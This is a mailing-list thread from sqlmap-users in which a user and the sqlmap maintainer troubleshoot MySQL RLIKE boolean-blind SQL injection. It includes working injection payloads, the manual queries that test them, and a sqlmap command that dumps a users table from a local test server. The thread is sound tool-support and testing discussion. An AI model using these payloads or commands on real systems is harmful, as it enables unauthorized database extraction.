Re: [sqlmap-users] Trying to figure out why boolean RLIKE only works sometimes
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2015-02-22 13:16:12
|
"I only bring it up because sql map has no problem grabbing the database with rlike but can't enumerate the values from the user table" $ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1" --batch --test-filter="RLIKE" --dump -D testdb -T users ... sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28 END)) --- ... [14:14:52] [INFO] postprocessing table dump Database: testdb Table: users [5 entries] +----+--------+-----------------------------------------+ | id | name | surname | +----+--------+-----------------------------------------+ | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | | 4 | NULL | nameisnull | | 5 | md5 | 098f6bcd4621d373cade4e832627b4f6 (test) | +----+--------+-----------------------------------------+ On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bpe...@gm...> wrote: > Right, in the sql statement where I select 'a', the ord of this is not > greater than 112, and it fails as expected with parens not balanced. > > The query below this that selects the first name from users should be > functionally equivalent to select 'a' as mid is used to select the first > character of the first username which is 'admin' as shown, but this > statement does not fail as expected. > > I am at a loss as to why the latter does not fail when the inner select is > functionally equivalent to select 'a', and the former fails as expected. > > I only bring it up because sql map has no problem grabbing the database > with rlike but can't enumerate the values from the user table, and I logged > into the server as root to try to figure out what the issue might be and > this seems to be the root cause. > > Sent from a phone > > On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm...> > wrote: > > Hi. > > Maybe I've mistaken, but you are looking this RLIKE wrong. Its function > here (in your case) is to PROVOKE errors on False, and that's exactly > what's going on here. > > In case of True, RLIKE is called with perfectly valid 0x7474747474, while > in case of False its called with errorneous regexp 0x28 ('parentheses not > balanced'). > > Bye > > On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...> > wrote: > >> Have an injection that I can use RLIKE to induce a 500 error, but it only >> works in some circumstances. Enumerating the DATABASE() value works, as >> well as the current user, but enumerating values from the database tables >> fails. Even as root on the box, the RLIKE query fails to throw an exception >> when attempting to use RLIKE in some instances. >> >> As you can see in the output below, the user can select the first name >> value from the users table (which is ‘admin’). When using RLIKE to test the >> first character returned with DATABASE() (a ‘p’), you get the parentheses >> not balanced exception as expected. You also get this exception when simply >> selecting ‘a’. >> >> But when you select the first row from the users table and grab the first >> character (an ‘a’), no exception is thrown and an empty result set is >> returned. >> >> Any thoughts? >> >> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN >> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); >> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp >> >> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN >> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); >> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp >> >> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN >> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN >> 0x7474747474 ELSE 0x28 END)); >> Empty set (0.01 sec) >> >> mysql> SELECT `name` from users LIMIT 0,1; >> +-------+ >> | name | >> +-------+ >> | admin | >> +-------+ >> 1 row in set (0.00 sec) >> >> mysql> >> >> >> ------------------------------------------------------------------------------ >> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server >> from Actuate! Instantly Supercharge Your Business Reports and Dashboards >> with Interactivity, Sharing, Native Excel Exports, App Integration & more >> Get technology previously reserved for billion-dollar corporations, FREE >> >> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > > -- Miroslav Stampar http://about.me/stamparm |